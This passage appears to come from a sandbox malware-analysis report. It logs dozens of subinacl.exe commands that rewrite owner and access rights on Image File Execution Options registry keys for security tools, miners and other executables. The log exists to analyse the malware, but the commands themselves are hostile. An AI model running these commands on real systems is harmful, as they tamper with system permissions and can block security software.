    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fud15.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:716
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fud16.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4828
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fwnrww.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3112
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gcclient.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2044
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDSC.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1756
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GeekBuddyRSP.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3864
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3260
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Go.EXE" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3224
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gotopbr.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4808
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GWCtlSrv.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4908
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GWIdlMon.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3220
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gy.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4512
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hale.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1088
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\help.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3344
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\helper.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:5112
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hitleap-viewer-browser.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4496
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hitleap-viewer.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3628
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HitmanPro x64.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1644
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hkcmd.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3380
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Hkufhbj.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4744
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hmac.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:704
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\host32.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1104
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3144
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HostedAgent.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4004
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HostStore.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4924
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HostXmrig.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3636
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HpSrv.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:520
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hpssmhd.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2176
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HS_Svc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2344
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hscangui.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2612
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icsys.icn.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1108
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iddlen.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4424
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\igateway.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1352
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iimaia.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1600
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMF.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4968
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMFsrv.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1884
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMFTips.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2972
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\indexer.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:948
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ingloca.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2168
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InjectWinSockServiceV3.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4940
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InoRPC.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2976
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InoRT.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2296
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InoTask.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2628
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InstantSupport.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4396
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Intelme.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:5068
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Interl thesaurus service.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4052
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IObitUninstaler.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2316
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IProtectorService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4980
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iptray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3472
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipts.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4376
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipz.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2896
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipz2.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2656
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Isass.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1360
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ITbrain_AntiMalware_Service.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3840
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Javagroup.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:536
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Javaj.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4036
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\javal.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3228
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JavaUpdater.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2912
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jingling.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:116
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jixlea.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:904
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jozruq.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:748
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jusched.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3736
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KasAVSrv.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3480
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\klvk.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1892
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[email protected]" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4488
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[email protected]" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1896
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPortScan3.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3960
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kryptex.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2104
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kryptex7.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1548
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSafeTray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4520
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSP.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1528
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvpncsvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3992
- - C:\Windows\subinacl.exe
